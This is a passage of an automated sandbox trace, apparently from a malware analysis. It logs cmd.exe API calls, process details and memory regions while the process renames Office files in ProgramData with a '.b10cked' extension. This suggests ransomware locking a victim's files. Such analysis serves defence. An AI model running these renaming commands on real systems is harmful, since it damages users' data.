lpData=0x26ea48*=0x40, lpcbData=0x26ea40*=0x1000) returned 0x2 [0173.564] RegCloseKey (hKey=0x40) returned 0x0 [0173.564] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ea3c | out: phkResult=0x26ea3c*=0x40) returned 0x0 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x0, lpData=0x26ea48*=0x40, lpcbData=0x26ea40*=0x1000) returned 0x2 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x4, lpData=0x26ea48*=0x1, lpcbData=0x26ea40*=0x4) returned 0x0 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x0, lpData=0x26ea48*=0x1, lpcbData=0x26ea40*=0x1000) returned 0x2 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x4, lpData=0x26ea48*=0x0, lpcbData=0x26ea40*=0x4) returned 0x0 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x4, lpData=0x26ea48*=0x9, lpcbData=0x26ea40*=0x4) returned 0x0 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x4, lpData=0x26ea48*=0x9, lpcbData=0x26ea40*=0x4) returned 0x0 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x0, lpData=0x26ea48*=0x9, lpcbData=0x26ea40*=0x1000) returned 0x2 [0173.564] 
RegCloseKey (hKey=0x40) returned 0x0 [0173.564] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886389 [0173.564] srand (_Seed=0x5b886389) [0173.564] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll.b10cked\"" [0173.565] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll.b10cked\"" [0173.565] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.565] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x351970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0173.565] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0173.565] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0173.565] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0173.565] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0173.565] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0173.565] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0173.565] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0173.565] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0173.565] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0173.565] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned 
-2 [0173.565] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0173.565] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0173.566] GetEnvironmentStringsW () returned 0x352360* [0173.566] FreeEnvironmentStringsW (penv=0x352360) returned 1 [0173.566] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.566] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0173.566] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0173.566] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0173.566] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0173.566] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0173.566] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0173.566] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0173.566] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0173.566] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0173.566] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f808 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.566] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f808, lpFilePart=0x26f804 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f804*="Desktop") returned 0x18 [0173.566] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0173.566] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f584 | out: lpFindFileData=0x26f584) returned 0x3509f0 [0173.566] FindClose (in: hFindFile=0x3509f0 | out: hFindFile=0x3509f0) returned 1 [0173.566] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f584 | out: lpFindFileData=0x26f584) returned 0x3509f0 [0173.567] FindClose 
(in: hFindFile=0x3509f0 | out: hFindFile=0x3509f0) returned 1 [0173.567] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f584 | out: lpFindFileData=0x26f584) returned 0x3509f0 [0173.567] FindClose (in: hFindFile=0x3509f0 | out: hFindFile=0x3509f0) returned 1 [0173.567] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0173.567] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0173.567] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0173.567] GetEnvironmentStringsW () returned 0x350210* [0173.567] FreeEnvironmentStringsW (penv=0x350210) returned 1 [0173.567] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.568] GetConsoleOutputCP () returned 0x1b5 [0173.568] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.568] GetUserDefaultLCID () returned 0x409 [0173.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0173.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f948, cchData=128 | out: lpLCData="0") returned 2 [0173.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f948, cchData=128 | out: lpLCData="0") returned 2 [0173.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f948, cchData=128 | out: lpLCData="1") returned 2 [0173.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0173.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0173.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0173.568] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0173.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0173.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0173.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0173.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0173.568] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0173.569] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0173.569] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0173.569] GetConsoleTitleW (in: lpConsoleTitle=0x340930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.570] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0173.570] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0173.570] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0173.570] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0173.570] _wcsicmp (_String1="move", _String2=")") returned 68 [0173.570] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0173.570] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0173.570] _wcsicmp (_String1="IF", _String2="move") returned -4 [0173.570] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0173.570] _wcsicmp (_String1="REM", _String2="move") returned 5 [0173.571] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0173.574] GetConsoleTitleW (in: lpConsoleTitle=0x26f640, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.574] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0173.574] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0173.574] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0173.574] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0173.575] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0173.575] _wcsicmp (_String1="move", _String2="CD") returned 10 [0173.575] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0173.575] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0173.575] _wcsicmp (_String1="move", _String2="REN") returned -5 [0173.575] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0173.575] _wcsicmp (_String1="move", _String2="SET") returned -6 [0173.575] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0173.575] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0173.575] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0173.575] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0173.575] _wcsicmp (_String1="move", _String2="MD") returned 11 [0173.575] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0173.575] _wcsicmp (_String1="move", _String2="RD") returned -5 [0173.575] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0173.575] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0173.575] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0173.575] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0173.575] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0173.575] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0173.575] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0173.575] _wcsicmp (_String1="move", _String2="VER") returned -9 [0173.575] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0173.575] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0173.575] _wcsicmp (_String1="move", _String2="SETLOCAL") returned 
-6 [0173.575] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0173.575] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0173.575] _wcsicmp (_String1="move", _String2="START") returned -6 [0173.575] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0173.575] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0173.575] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0173.577] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.577] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.577] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f3fc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f3f4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f3f4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 
_MaxCount=0x7) returned -11 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0173.579] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0173.579] _wcsicmp (_String1="SGRESD~1.TRX", _String2=".") returned 69 [0173.579] _wcsicmp 
(_String1="SGRESD~1.TRX", _String2="..") returned 69 [0173.579] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\sgresd~1.trx")) returned 0x2020 [0173.579] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x351f18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.579] SetErrorMode (uMode=0x0) returned 0x0 [0173.579] SetErrorMode (uMode=0x1) returned 0x0 [0173.579] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX", nBufferLength=0x104, lpBuffer=0x26ed84, lpFilePart=0x26ed6c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX", lpFilePart=0x26ed6c*="SGRESD~1.TRX") returned 0x3c [0173.579] SetErrorMode (uMode=0x0) returned 0x1 [0173.579] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0173.579] _wcsicmp (_String1="SGRESD~1.TRX", _String2=".") returned 69 [0173.579] _wcsicmp (_String1="SGRESD~1.TRX", _String2="..") returned 69 [0173.580] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\sgresd~1.trx")) returned 0x2020 [0173.580] SetErrorMode (uMode=0x0) returned 0x0 [0173.580] SetErrorMode (uMode=0x1) returned 0x0 [0173.580] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX", nBufferLength=0x104, lpBuffer=0x26f200, lpFilePart=0x26ef98 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX", lpFilePart=0x26ef98*="SGRESD~1.TRX") returned 0x3c [0173.580] SetErrorMode (uMode=0x0) returned 0x1 [0173.580] SetErrorMode (uMode=0x0) returned 0x0 [0173.580] SetErrorMode (uMode=0x1) returned 0x0 [0173.580] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x26f408, lpFilePart=0x26ef98 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll.b10cked", lpFilePart=0x26ef98*="SGRES.DLL.trx_dll.b10cked") returned 0x49 [0173.580] SetErrorMode (uMode=0x0) returned 0x1 [0173.580] SetLastError (dwErrCode=0x0) [0173.580] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\sgres.dll.trx_dll.b10cked")) returned 0xffffffff [0173.580] GetLastError () returned 0x2 [0173.580] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x26e914, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e914) returned 0x352128 [0173.580] FindNextFileW (in: hFindFile=0x352128, lpFindFileData=0x26e914 | out: lpFindFileData=0x26e914) returned 0 [0173.581] GetLastError () returned 0x12 [0173.581] FindClose (in: hFindFile=0x352128 | out: hFindFile=0x352128) returned 1 [0173.582] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x351cb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x351cb8) returned 0x352128 [0173.582] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x26ebac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x49 [0173.582] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x26ebac, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll", lpFilePart=0x0) returned 0x41 [0173.582] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\sgres.dll.trx_dll")) returned 0x2020 [0173.582] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\sgres.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\sgres.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0173.583] FindClose (in: hFindFile=0x352128 | out: hFindFile=0x352128) returned 1 [0173.583] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26eb60 | out: _Buffer=" 1") returned 9 [0173.583] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.583] GetFileType (hFile=0x7) returned 0x2 [0173.589] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0173.589] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26eaec | out: lpMode=0x26eaec) returned 1 [0173.589] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.589] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26eb20 | out: lpConsoleScreenBufferInfo=0x26eb20) returned 1 [0173.590] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0173.590] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26eb60 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0173.590] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26eb44, 
lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26eb44*=0x1a) returned 1 [0173.590] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.591] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0173.591] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.591] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0173.591] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.591] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0173.591] SetConsoleInputExeNameW () returned 0x1 [0173.591] GetConsoleOutputCP () returned 0x1b5 [0173.591] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.591] SetThreadUILanguage (LangId=0x0) returned 0x409 [0173.591] exit (_Code=0) Process: id = "303" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167e0" os_pid = "0xac0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 23624 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 23625 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = 
private name = "private_0x0000000000030000" filename = "" Region: id = 23626 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 23627 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 23628 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 23629 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 23630 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23631 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23632 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 23633 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 